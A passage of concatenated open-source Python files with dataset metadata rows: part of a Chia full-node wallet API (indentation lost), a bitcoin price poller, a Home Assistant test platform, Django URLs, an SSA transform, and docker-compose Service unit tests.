response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_removals, response)
return msg
@api_request
async def send_transaction(self, request: wallet_protocol.SendTransaction, *, test=False) -> Optional[Message]:
spend_name = request.transaction.name()
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(request.transaction, None, spend_name, None, test))
)
# Waits for the transaction to go into the mempool, times out after 45 seconds.
status, error = None, None
sleep_time = 0.01
for i in range(int(45 / sleep_time)):
await asyncio.sleep(sleep_time)
for potential_name, potential_status, potential_error in self.full_node.transaction_responses:
if spend_name == potential_name:
status = potential_status
error = potential_error
break
if status is not None:
break
if status is None:
response = wallet_protocol.TransactionAck(spend_name, uint8(MempoolInclusionStatus.PENDING), None)
else:
error_name = error.name if error is not None else None
if status == MempoolInclusionStatus.SUCCESS:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
else:
                # If it failed or is pending, but it previously succeeded (in mempool), this is idempotence; return SUCCESS
if self.full_node.mempool_manager.get_spendbundle(spend_name) is not None:
response = wallet_protocol.TransactionAck(
spend_name, uint8(MempoolInclusionStatus.SUCCESS.value), None
)
else:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
msg = make_msg(ProtocolMessageTypes.transaction_ack, response)
return msg
@api_request
async def request_puzzle_solution(self, request: wallet_protocol.RequestPuzzleSolution) -> Optional[Message]:
coin_name = request.coin_name
height = request.height
coin_record = await self.full_node.coin_store.get_coin_record(coin_name)
reject = wallet_protocol.RejectPuzzleSolution(coin_name, height)
reject_msg = make_msg(ProtocolMessageTypes.reject_puzzle_solution, reject)
if coin_record is None or coin_record.spent_block_index != height:
return reject_msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(height)
if header_hash is None:
return reject_msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is None or block.transactions_generator is None:
return reject_msg
block_generator: Optional[BlockGenerator] = await self.full_node.blockchain.get_block_generator(block)
assert block_generator is not None
error, puzzle, solution = get_puzzle_and_solution_for_coin(
block_generator, coin_name, self.full_node.constants.MAX_BLOCK_COST_CLVM
)
if error is not None:
return reject_msg
pz = Program.to(puzzle)
sol = Program.to(solution)
wrapper = PuzzleSolutionResponse(coin_name, height, pz, sol)
response = wallet_protocol.RespondPuzzleSolution(wrapper)
response_msg = make_msg(ProtocolMessageTypes.respond_puzzle_solution, response)
return response_msg
@api_request
async def request_header_blocks(self, request: wallet_protocol.RequestHeaderBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
return None
header_hashes: List[bytes32] = []
for i in range(request.start_height, request.end_height + 1):
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash is None:
reject = RejectHeaderBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_header_blocks, reject)
return msg
header_hashes.append(header_hash)
blocks: List[FullBlock] = await self.full_node.block_store.get_blocks_by_hash(header_hashes)
header_blocks = []
for block in blocks:
added_coins_records = await self.full_node.coin_store.get_coins_added_at_height(block.height)
removed_coins_records = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
added_coins = [record.coin for record in added_coins_records if not record.coinbase]
removal_names = [record.coin.name() for record in removed_coins_records]
header_block = get_block_header(block, added_coins, removal_names)
header_blocks.append(header_block)
msg = make_msg(
ProtocolMessageTypes.respond_header_blocks,
wallet_protocol.RespondHeaderBlocks(request.start_height, request.end_height, header_blocks),
)
return msg
@api_request
async def respond_compact_proof_of_time(self, request: timelord_protocol.RespondCompactProofOfTime):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_proof_of_time(request)
@execute_task
@peer_required
@api_request
@bytes_required
async def new_compact_vdf(
self, request: full_node_protocol.NewCompactVDF, peer: ws.WSChiaConnection, request_bytes: bytes = b""
):
if self.full_node.sync_store.get_sync_mode():
return None
if len(self.full_node.compact_vdf_sem._waiters) > 20:
self.log.debug(f"Ignoring NewCompactVDF: {request}, _waiters")
return
name = std_hash(request_bytes)
if name in self.full_node.compact_vdf_requests:
self.log.debug(f"Ignoring NewCompactVDF: {request}, already requested")
return
self.full_node.compact_vdf_requests.add(name)
# this semaphore will only allow a limited number of tasks call
# new_compact_vdf() at a time, since it can be expensive
async with self.full_node.compact_vdf_sem:
try:
await self.full_node.new_compact_vdf(request, peer)
finally:
self.full_node.compact_vdf_requests.remove(name)
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_compact_vdf])
async def request_compact_vdf(self, request: full_node_protocol.RequestCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.request_compact_vdf(request, peer)
@peer_required
@api_request
async def respond_compact_vdf(self, request: full_node_protocol.RespondCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_vdf(request, peer)
@peer_required
@api_request
async def register_interest_in_puzzle_hash(
self, request: wallet_protocol.RegisterForPhUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_puzzle_hash:
self.full_node.peer_puzzle_hash[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
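        # Besides direct puzzle-hash matches, also report coins that reference these puzzle hashes via on-chain hints.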
hint_coin_ids = []
# Add peer to the "Subscribed" dictionary
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for puzzle_hash in request.puzzle_hashes:
ph_hint_coins = await self.full_node.hint_store.get_coin_ids(puzzle_hash)
hint_coin_ids.extend(ph_hint_coins)
if puzzle_hash not in self.full_node.ph_subscriptions:
self.full_node.ph_subscriptions[puzzle_hash] = set()
if (
peer.peer_node_id not in self.full_node.ph_subscriptions[puzzle_hash]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.ph_subscriptions[puzzle_hash].add(peer.peer_node_id)
self.full_node.peer_puzzle_hash[peer.peer_node_id].add(puzzle_hash)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
# Send all coins with requested puzzle hash that have been created after the specified height
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_puzzle_hashes(
include_spent_coins=True, puzzle_hashes=request.puzzle_hashes, min_height=request.min_height
)
if len(hint_coin_ids) > 0:
hint_states = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=hint_coin_ids, min_height=request.min_height
)
states.extend(hint_states)
response = wallet_protocol.RespondToPhUpdates(request.puzzle_hashes, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_ph_update, response)
return msg
@peer_required
@api_request
async def register_interest_in_coin(
self, request: wallet_protocol.RegisterForCoinUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_coin_ids:
self.full_node.peer_coin_ids[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for coin_id in request.coin_ids:
if coin_id not in self.full_node.coin_subscriptions:
self.full_node.coin_subscriptions[coin_id] = set()
if (
peer.peer_node_id not in self.full_node.coin_subscriptions[coin_id]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.coin_subscriptions[coin_id].add(peer.peer_node_id)
self.full_node.peer_coin_ids[peer.peer_node_id].add(coin_id)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=request.coin_ids, min_height=request.min_height
)
response = wallet_protocol.RespondToCoinUpdates(request.coin_ids, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_coin_update, response)
return msg
@api_request
async def request_children(self, request: wallet_protocol.RequestChildren) -> Optional[Message]:
coin_records: List[CoinRecord] = await self.full_node.coin_store.get_coin_records_by_parent_ids(
True, [request.coin_name]
)
states = [record.coin_state for record in coin_records]
response = wallet_protocol.RespondChildren(states)
msg = make_msg(ProtocolMessageTypes.respond_children, response)
return msg
@api_request
async def request_ses_hashes(self, request: wallet_protocol.RequestSESInfo):
"""Returns the start and end height of a sub-epoch for the height specified in request"""
ses_height = self.full_node.blockchain.get_ses_heights()
start_height = request.start_height
end_height = request.end_height
ses_hash_heights = []
ses_reward_hashes = []
for idx, ses_start_height in enumerate(ses_height):
if idx == len(ses_height) - 1:
break
next_ses_height = ses_height[idx + 1]
# start_ses_hash
if ses_start_height <= start_height < next_ses_height:
ses_hash_heights.append([ses_start_height, next_ses_height])
ses: SubEpochSummary = self.full_node.blockchain.get_ses(ses_start_height)
ses_reward_hashes.append(ses.reward_chain_hash)
if ses_start_height < end_height < next_ses_height:
break
else:
if idx == len(ses_height) - 2:
break
                # Otherwise add one more sub-epoch span, since the requested range crosses into the next sub-epoch
next_next_height = ses_height[idx + 2]
ses_hash_heights.append([next_ses_height, next_next_height])
nex_ses: SubEpochSummary = self.full_node.blockchain.get_ses(next_ses_height)
ses_reward_hashes.append(nex_ses.reward_chain_hash)
break
response = RespondSESInfo(ses_reward_hashes, ses_hash_heights)
msg = make_msg(ProtocolMessageTypes.respond_ses_hashes, response)
return msg
| 47.811796 | 120 | 0.645049 | ["Apache-2.0"] | AppleOfEnlightenment/chia-blockchain | chia/full_node/full_node_api.py | 72,148 | Python
import requests
import json
from time import sleep
from datetime import datetime
import sys
import traceback
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("outputfile", nargs='?', default="bitcoin_price.json")
parser.add_argument("errorfile", nargs='?', default="bitcoin_price_error.txt")
args = parser.parse_args()
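# Fetch the current Bitstamp ticker, add a human-readable UTC datetime, and append it
# as a JSON line to the output file; any failure is logged to the error file instead.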
def getBitcoinPrice():
URL = 'https://www.bitstamp.net/api/ticker/'
try:
r = requests.get(URL)
bitcoindata = json.loads(r.text)
bitcoindata['datetime'] = datetime.utcfromtimestamp(int(bitcoindata['timestamp'])).strftime('%Y-%m-%d-%H-%M-%S')
with open(args.outputfile, mode='a') as file:
file.write('{},\n'.format(json.dumps(bitcoindata)))
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
with open(args.errorfile, mode='a') as file:
traceback.print_exc(file=file)
file.write(('-'*100)+'\n\n')
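# Poll the ticker indefinitely, once every 10 seconds.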
while True:
getBitcoinPrice()
    sleep(10)
| 30.939394 | 128 | 0.644466 | [
"MIT"
] | OrhanAbuska/Bitcoin-Prediction-Master | get_bitcoin_new.py | 1,021 | Python |
"""
Provide a mock switch platform.
Call init before using it in your tests to ensure clean test data.
"""
from homeassistant.const import STATE_ON, STATE_OFF
from tests.common import MockToggleDevice
DEVICES = []
def init(empty=False):
"""Initialize the platform with devices."""
global DEVICES
DEVICES = [] if empty else [
MockToggleDevice('AC', STATE_ON),
MockToggleDevice('AC', STATE_OFF),
MockToggleDevice(None, STATE_OFF)
]
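# Tests are expected to call init() (or init(empty=True)) first so that DEVICES starts
# from a known state before the platform is set up.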
async def async_setup_platform(hass, config, async_add_devices_callback,
discovery_info=None):
"""Find and return test switches."""
async_add_devices_callback(DEVICES)
| 24.464286 | 72 | 0.686131 | [
"Apache-2.0"
] | DevRGT/home-assistant | tests/testing_config/custom_components/switch/test.py | 685 | Python |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name="listings"),
path('<int:listing_id>', views.listing, name="listing"),
path('search', views.search, name="search")
]
| 22.2 | 60 | 0.662162 | [
"MIT"
] | toyerovsky/btre-project | listings/urls.py | 222 | Python |
# AST transform that puts programs in SSA form
import collections
from translate import *
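# SSAVisitor renames every assignment target to <name>_<n> (a fresh index per static
# assignment) and, when the branches of an IF assign a variable, joins the competing
# definitions with a PHI node after the branch.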
class SSAVisitor(Visitor):
def __init__(self):
# Number of static assignments to that variable seen so far.
self.definition_counter = collections.defaultdict(int)
# Name of the live definition of each variable before a node.
self.prev_definition = collections.defaultdict(dict)
# Name of the last definition of each variable in a node.
self.last_definition = collections.defaultdict(dict)
# Node in SSA form.
self.ssa_node = {}
def format_name(self, name, definition_id):
return "{}_{}".format(name, definition_id)
def visit(self, node, is_leaving):
if isinstance(node, Node) and not is_leaving:
if node.kind == NT.IF:
self.prev_definition[node] = dict(self.definition_counter)
self.prev_definition[node.args[1]] = self.prev_definition[node]
if len(node.args) == 3:
self.prev_definition[node.args[2]] = self.prev_definition[node]
# The if branches have their prev_definition set by the parent,
# so they don't redefine it here.
elif node not in self.prev_definition:
self.prev_definition[node] = dict(self.definition_counter)
elif isinstance(node, Node) and is_leaving:
if node.kind == NT.IF:
then_stmts = self.ssa_node[node.args[1]].args
has_else = len(node.args) == 3
if has_else:
else_stmt = self.ssa_node[node.args[2]]
for name, last_name in self.last_definition[node.args[1]].items():
c = ASTConcretizer(last_name,
Name(
self.format_name(name,
self.prev_definition[node][name] - 1)))
walk(else_stmt, c)
else_stmt = c.modified_node[else_stmt]
else_stmts = else_stmt.args if has_else else []
assigned_variables = set(self.last_definition[node.args[1]].keys())
if has_else:
assigned_variables.update(self.last_definition[node.args[2]].keys())
phis = []
for v in assigned_variables:
then_name = (self.last_definition[node.args[1]].get(v) or
self.format_name(v, self.prev_definition[node][v]))
else_name = ((has_else and self.last_definition[node.args[2]].get(v)) or
self.format_name(v, self.prev_definition[node][v] - 1))
phi_name = self.format_name(v, self.definition_counter[v])
phis.append(Node(NT.ASSIGNMENT, [
Name(phi_name),
Node(NT.PHI, [
self.ssa_node[node.args[0]],
Name(then_name),
Name(else_name),
])
]))
self.definition_counter[v] += 1
self.last_definition[node][v] = phi_name
self.ssa_node[node] = Node(NT.STMTLIST, then_stmts + else_stmts + phis)
elif node.kind == NT.ASSIGNMENT:
new_name = self.format_name(
node.args[0].name,
self.definition_counter[node.args[0].name])
self.ssa_node[node] = Node(NT.ASSIGNMENT, [
Name(new_name),
self.ssa_node[node.args[1]]
])
self.last_definition[node][node.args[0].name] = new_name
self.definition_counter[node.args[0].name] += 1
elif node.kind == NT.PARAMLIST:
names = []
for name in node.args:
self.last_definition[node][name.name] = self.format_name(name.name, 0)
self.definition_counter[name.name] = 1
names.append(Name(self.last_definition[node][name.name]))
self.ssa_node[node] = Node(NT.PARAMLIST, names)
else:
children = []
for a in node.args:
children.append(self.ssa_node[a])
for k, v in self.last_definition[a].items():
self.last_definition[node][k] = v
self.ssa_node[node] = Node(node.kind, children)
elif isinstance(node, Name):
self.ssa_node[node] = Name(self.format_name(
node.name,
self.definition_counter[node.name] - 1))
else:
self.ssa_node[node] = node
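# FlattenVisitor collapses the nested STMTLIST nodes introduced by the SSA rewrite of
# IF statements into a single flat statement list.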
class FlattenVisitor(Visitor):
def __init__(self):
self.flat_node = {}
def visit(self, node, is_leaving):
if not is_leaving:
self.flat_node[node] = node
return
if isinstance(node, Node) and node.kind == NT.STMTLIST:
children = []
for a in node.args:
c = self.flat_node[a]
if c.kind == NT.STMTLIST:
children.extend(c.args)
else:
children.append(c)
self.flat_node[node] = Node(node.kind, children)
elif isinstance(node, Node):
children = []
for a in node.args:
children.append(self.flat_node[a])
self.flat_node[node] = Node(node.kind, children)
@staticmethod
def flatten(node):
v = FlattenVisitor()
walk(node, v)
return v.flat_node[node]
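# Full pipeline: unroll the AST, rewrite it into SSA form, then flatten the result.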
def ssa(node):
unroller = ASTUnroller()
walk(node, unroller)
node = unroller.unrolled_node[node]
v = SSAVisitor()
walk(node, v)
return FlattenVisitor.flatten(v.ssa_node[node])
| 38.62987 | 92 | 0.525635 | [
"MIT"
] | gpoesia/sketchy | ssa.py | 5,949 | Python |
from __future__ import absolute_import
from __future__ import unicode_literals
import docker
import pytest
from docker.constants import DEFAULT_DOCKER_API_VERSION
from docker.errors import APIError
from docker.errors import NotFound
from .. import mock
from .. import unittest
from compose.config.errors import DependencyError
from compose.config.types import MountSpec
from compose.config.types import ServicePort
from compose.config.types import ServiceSecret
from compose.config.types import VolumeFromSpec
from compose.config.types import VolumeSpec
from compose.const import API_VERSIONS
from compose.const import LABEL_CONFIG_HASH
from compose.const import LABEL_ONE_OFF
from compose.const import LABEL_PROJECT
from compose.const import LABEL_SERVICE
from compose.const import SECRETS_PATH
from compose.container import Container
from compose.errors import OperationFailedError
from compose.parallel import ParallelStreamWriter
from compose.project import OneOffFilter
from compose.service import build_ulimits
from compose.service import build_volume_binding
from compose.service import BuildAction
from compose.service import ContainerNetworkMode
from compose.service import format_environment
from compose.service import formatted_ports
from compose.service import get_container_data_volumes
from compose.service import ImageType
from compose.service import merge_volume_bindings
from compose.service import NeedsBuildError
from compose.service import NetworkMode
from compose.service import NoSuchImageError
from compose.service import parse_repository_tag
from compose.service import Service
from compose.service import ServiceNetworkMode
from compose.service import warn_on_masked_volume
class ServiceTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_containers(self):
service = Service('db', self.mock_client, 'myproject', image='foo')
self.mock_client.containers.return_value = []
assert list(service.containers()) == []
def test_containers_with_containers(self):
self.mock_client.containers.return_value = [
dict(Name=str(i), Image='foo', Id=i) for i in range(3)
]
service = Service('db', self.mock_client, 'myproject', image='foo')
assert [c.id for c in service.containers()] == list(range(3))
expected_labels = [
'{0}=myproject'.format(LABEL_PROJECT),
'{0}=db'.format(LABEL_SERVICE),
'{0}=False'.format(LABEL_ONE_OFF),
]
self.mock_client.containers.assert_called_once_with(
all=False,
filters={'label': expected_labels})
def test_container_without_name(self):
self.mock_client.containers.return_value = [
{'Image': 'foo', 'Id': '1', 'Name': '1'},
{'Image': 'foo', 'Id': '2', 'Name': None},
{'Image': 'foo', 'Id': '3'},
]
service = Service('db', self.mock_client, 'myproject', image='foo')
assert [c.id for c in service.containers()] == ['1']
assert service._next_container_number() == 2
assert service.get_container(1).id == '1'
def test_get_volumes_from_container(self):
container_id = 'aabbccddee'
service = Service(
'test',
image='foo',
volumes_from=[
VolumeFromSpec(
mock.Mock(id=container_id, spec=Container),
'rw',
'container')])
assert service._get_volumes_from() == [container_id + ':rw']
def test_get_volumes_from_container_read_only(self):
container_id = 'aabbccddee'
service = Service(
'test',
image='foo',
volumes_from=[
VolumeFromSpec(
mock.Mock(id=container_id, spec=Container),
'ro',
'container')])
assert service._get_volumes_from() == [container_id + ':ro']
def test_get_volumes_from_service_container_exists(self):
container_ids = ['aabbccddee', '12345']
from_service = mock.create_autospec(Service)
from_service.containers.return_value = [
mock.Mock(id=container_id, spec=Container)
for container_id in container_ids
]
service = Service(
'test',
volumes_from=[VolumeFromSpec(from_service, 'rw', 'service')],
image='foo')
assert service._get_volumes_from() == [container_ids[0] + ":rw"]
def test_get_volumes_from_service_container_exists_with_flags(self):
for mode in ['ro', 'rw', 'z', 'rw,z', 'z,rw']:
container_ids = ['aabbccddee:' + mode, '12345:' + mode]
from_service = mock.create_autospec(Service)
from_service.containers.return_value = [
mock.Mock(id=container_id.split(':')[0], spec=Container)
for container_id in container_ids
]
service = Service(
'test',
volumes_from=[VolumeFromSpec(from_service, mode, 'service')],
image='foo')
assert service._get_volumes_from() == [container_ids[0]]
def test_get_volumes_from_service_no_container(self):
container_id = 'abababab'
from_service = mock.create_autospec(Service)
from_service.containers.return_value = []
from_service.create_container.return_value = mock.Mock(
id=container_id,
spec=Container)
service = Service(
'test',
image='foo',
volumes_from=[VolumeFromSpec(from_service, 'rw', 'service')])
assert service._get_volumes_from() == [container_id + ':rw']
from_service.create_container.assert_called_once_with()
def test_memory_swap_limit(self):
self.mock_client.create_host_config.return_value = {}
service = Service(
name='foo',
image='foo',
hostname='name',
client=self.mock_client,
mem_limit=1000000000,
memswap_limit=2000000000)
service._get_container_create_options({'some': 'overrides'}, 1)
assert self.mock_client.create_host_config.called
assert self.mock_client.create_host_config.call_args[1]['mem_limit'] == 1000000000
assert self.mock_client.create_host_config.call_args[1]['memswap_limit'] == 2000000000
def test_self_reference_external_link(self):
service = Service(
name='foo',
external_links=['default_foo_1']
)
with pytest.raises(DependencyError):
service.get_container_name('foo', 1)
def test_mem_reservation(self):
self.mock_client.create_host_config.return_value = {}
service = Service(
name='foo',
image='foo',
hostname='name',
client=self.mock_client,
mem_reservation='512m'
)
service._get_container_create_options({'some': 'overrides'}, 1)
assert self.mock_client.create_host_config.called is True
assert self.mock_client.create_host_config.call_args[1]['mem_reservation'] == '512m'
def test_cgroup_parent(self):
self.mock_client.create_host_config.return_value = {}
service = Service(
name='foo',
image='foo',
hostname='name',
client=self.mock_client,
cgroup_parent='test')
service._get_container_create_options({'some': 'overrides'}, 1)
assert self.mock_client.create_host_config.called
assert self.mock_client.create_host_config.call_args[1]['cgroup_parent'] == 'test'
def test_log_opt(self):
self.mock_client.create_host_config.return_value = {}
log_opt = {'syslog-address': 'tcp://192.168.0.42:123'}
logging = {'driver': 'syslog', 'options': log_opt}
service = Service(
name='foo',
image='foo',
hostname='name',
client=self.mock_client,
log_driver='syslog',
logging=logging)
service._get_container_create_options({'some': 'overrides'}, 1)
assert self.mock_client.create_host_config.called
assert self.mock_client.create_host_config.call_args[1]['log_config'] == {
'Type': 'syslog', 'Config': {'syslog-address': 'tcp://192.168.0.42:123'}
}
def test_stop_grace_period(self):
self.mock_client.api_version = '1.25'
self.mock_client.create_host_config.return_value = {}
service = Service(
'foo',
image='foo',
client=self.mock_client,
stop_grace_period="1m35s")
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['stop_timeout'] == 95
def test_split_domainname_none(self):
service = Service(
'foo',
image='foo',
hostname='name.domain.tld',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['hostname'] == 'name.domain.tld', 'hostname'
assert not ('domainname' in opts), 'domainname'
def test_split_domainname_fqdn(self):
self.mock_client.api_version = '1.22'
service = Service(
'foo',
hostname='name.domain.tld',
image='foo',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['hostname'] == 'name', 'hostname'
assert opts['domainname'] == 'domain.tld', 'domainname'
def test_split_domainname_both(self):
self.mock_client.api_version = '1.22'
service = Service(
'foo',
hostname='name',
image='foo',
domainname='domain.tld',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['hostname'] == 'name', 'hostname'
assert opts['domainname'] == 'domain.tld', 'domainname'
def test_split_domainname_weird(self):
self.mock_client.api_version = '1.22'
service = Service(
'foo',
hostname='name.sub',
domainname='domain.tld',
image='foo',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['hostname'] == 'name.sub', 'hostname'
assert opts['domainname'] == 'domain.tld', 'domainname'
def test_no_default_hostname_when_not_using_networking(self):
service = Service(
'foo',
image='foo',
use_networking=False,
client=self.mock_client,
)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts.get('hostname') is None
def test_get_container_create_options_with_name_option(self):
service = Service(
'foo',
image='foo',
client=self.mock_client,
container_name='foo1')
name = 'the_new_name'
opts = service._get_container_create_options(
{'name': name},
1,
one_off=OneOffFilter.only)
assert opts['name'] == name
def test_get_container_create_options_does_not_mutate_options(self):
labels = {'thing': 'real'}
environment = {'also': 'real'}
service = Service(
'foo',
image='foo',
labels=dict(labels),
client=self.mock_client,
environment=dict(environment),
)
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
prev_container = mock.Mock(
id='ababab',
image_config={'ContainerConfig': {}})
prev_container.get.return_value = None
opts = service._get_container_create_options(
{},
1,
previous_container=prev_container)
assert service.options['labels'] == labels
assert service.options['environment'] == environment
assert opts['labels'][LABEL_CONFIG_HASH] == \
'2524a06fcb3d781aa2c981fc40bcfa08013bb318e4273bfa388df22023e6f2aa'
assert opts['environment'] == ['also=real']
def test_get_container_create_options_sets_affinity_with_binds(self):
service = Service(
'foo',
image='foo',
client=self.mock_client,
)
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
prev_container = mock.Mock(
id='ababab',
image_config={'ContainerConfig': {'Volumes': ['/data']}})
def container_get(key):
return {
'Mounts': [
{
'Destination': '/data',
'Source': '/some/path',
'Name': 'abab1234',
},
]
}.get(key, None)
prev_container.get.side_effect = container_get
opts = service._get_container_create_options(
{},
1,
previous_container=prev_container)
assert opts['environment'] == ['affinity:container==ababab']
def test_get_container_create_options_no_affinity_without_binds(self):
service = Service('foo', image='foo', client=self.mock_client)
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
prev_container = mock.Mock(
id='ababab',
image_config={'ContainerConfig': {}})
prev_container.get.return_value = None
opts = service._get_container_create_options(
{},
1,
previous_container=prev_container)
assert opts['environment'] == []
def test_get_container_not_found(self):
self.mock_client.containers.return_value = []
service = Service('foo', client=self.mock_client, image='foo')
with pytest.raises(ValueError):
service.get_container()
@mock.patch('compose.service.Container', autospec=True)
def test_get_container(self, mock_container_class):
container_dict = dict(Name='default_foo_2')
self.mock_client.containers.return_value = [container_dict]
service = Service('foo', image='foo', client=self.mock_client)
container = service.get_container(number=2)
assert container == mock_container_class.from_ps.return_value
mock_container_class.from_ps.assert_called_once_with(
self.mock_client, container_dict)
@mock.patch('compose.service.log', autospec=True)
def test_pull_image(self, mock_log):
service = Service('foo', client=self.mock_client, image='someimage:sometag')
service.pull()
self.mock_client.pull.assert_called_once_with(
'someimage',
tag='sometag',
stream=True,
platform=None)
mock_log.info.assert_called_once_with('Pulling foo (someimage:sometag)...')
def test_pull_image_no_tag(self):
service = Service('foo', client=self.mock_client, image='ababab')
service.pull()
self.mock_client.pull.assert_called_once_with(
'ababab',
tag='latest',
stream=True,
platform=None)
@mock.patch('compose.service.log', autospec=True)
def test_pull_image_digest(self, mock_log):
service = Service('foo', client=self.mock_client, image='someimage@sha256:1234')
service.pull()
self.mock_client.pull.assert_called_once_with(
'someimage',
tag='sha256:1234',
stream=True,
platform=None)
mock_log.info.assert_called_once_with('Pulling foo (someimage@sha256:1234)...')
@mock.patch('compose.service.log', autospec=True)
def test_pull_image_with_platform(self, mock_log):
self.mock_client.api_version = '1.35'
service = Service(
'foo', client=self.mock_client, image='someimage:sometag', platform='windows/x86_64'
)
service.pull()
assert self.mock_client.pull.call_count == 1
call_args = self.mock_client.pull.call_args
assert call_args[1]['platform'] == 'windows/x86_64'
@mock.patch('compose.service.log', autospec=True)
def test_pull_image_with_platform_unsupported_api(self, mock_log):
self.mock_client.api_version = '1.33'
service = Service(
'foo', client=self.mock_client, image='someimage:sometag', platform='linux/arm'
)
with pytest.raises(OperationFailedError):
service.pull()
def test_pull_image_with_default_platform(self):
self.mock_client.api_version = '1.35'
service = Service(
'foo', client=self.mock_client, image='someimage:sometag',
default_platform='linux'
)
assert service.platform == 'linux'
service.pull()
assert self.mock_client.pull.call_count == 1
call_args = self.mock_client.pull.call_args
assert call_args[1]['platform'] == 'linux'
@mock.patch('compose.service.Container', autospec=True)
def test_recreate_container(self, _):
mock_container = mock.create_autospec(Container)
service = Service('foo', client=self.mock_client, image='someimage')
service.image = lambda: {'Id': 'abc123'}
new_container = service.recreate_container(mock_container)
mock_container.stop.assert_called_once_with(timeout=10)
mock_container.rename_to_tmp_name.assert_called_once_with()
new_container.start.assert_called_once_with()
mock_container.remove.assert_called_once_with()
@mock.patch('compose.service.Container', autospec=True)
def test_recreate_container_with_timeout(self, _):
mock_container = mock.create_autospec(Container)
self.mock_client.inspect_image.return_value = {'Id': 'abc123'}
service = Service('foo', client=self.mock_client, image='someimage')
service.recreate_container(mock_container, timeout=1)
mock_container.stop.assert_called_once_with(timeout=1)
def test_parse_repository_tag(self):
assert parse_repository_tag("root") == ("root", "", ":")
assert parse_repository_tag("root:tag") == ("root", "tag", ":")
assert parse_repository_tag("user/repo") == ("user/repo", "", ":")
assert parse_repository_tag("user/repo:tag") == ("user/repo", "tag", ":")
assert parse_repository_tag("url:5000/repo") == ("url:5000/repo", "", ":")
assert parse_repository_tag("url:5000/repo:tag") == ("url:5000/repo", "tag", ":")
assert parse_repository_tag("root@sha256:digest") == ("root", "sha256:digest", "@")
assert parse_repository_tag("user/repo@sha256:digest") == ("user/repo", "sha256:digest", "@")
assert parse_repository_tag("url:5000/repo@sha256:digest") == (
"url:5000/repo", "sha256:digest", "@"
)
def test_create_container(self):
service = Service('foo', client=self.mock_client, build={'context': '.'})
self.mock_client.inspect_image.side_effect = [
NoSuchImageError,
{'Id': 'abc123'},
]
self.mock_client.build.return_value = [
'{"stream": "Successfully built abcd"}',
]
with mock.patch('compose.service.log', autospec=True) as mock_log:
service.create_container()
assert mock_log.warn.called
_, args, _ = mock_log.warn.mock_calls[0]
assert 'was built because it did not already exist' in args[0]
assert self.mock_client.build.call_count == 1
        assert self.mock_client.build.call_args[1]['tag'] == 'default_foo'
def test_ensure_image_exists_no_build(self):
service = Service('foo', client=self.mock_client, build={'context': '.'})
self.mock_client.inspect_image.return_value = {'Id': 'abc123'}
service.ensure_image_exists(do_build=BuildAction.skip)
assert not self.mock_client.build.called
def test_ensure_image_exists_no_build_but_needs_build(self):
service = Service('foo', client=self.mock_client, build={'context': '.'})
self.mock_client.inspect_image.side_effect = NoSuchImageError
with pytest.raises(NeedsBuildError):
service.ensure_image_exists(do_build=BuildAction.skip)
def test_ensure_image_exists_force_build(self):
service = Service('foo', client=self.mock_client, build={'context': '.'})
self.mock_client.inspect_image.return_value = {'Id': 'abc123'}
self.mock_client.build.return_value = [
'{"stream": "Successfully built abcd"}',
]
with mock.patch('compose.service.log', autospec=True) as mock_log:
service.ensure_image_exists(do_build=BuildAction.force)
assert not mock_log.warn.called
assert self.mock_client.build.call_count == 1
        assert self.mock_client.build.call_args[1]['tag'] == 'default_foo'
def test_build_does_not_pull(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
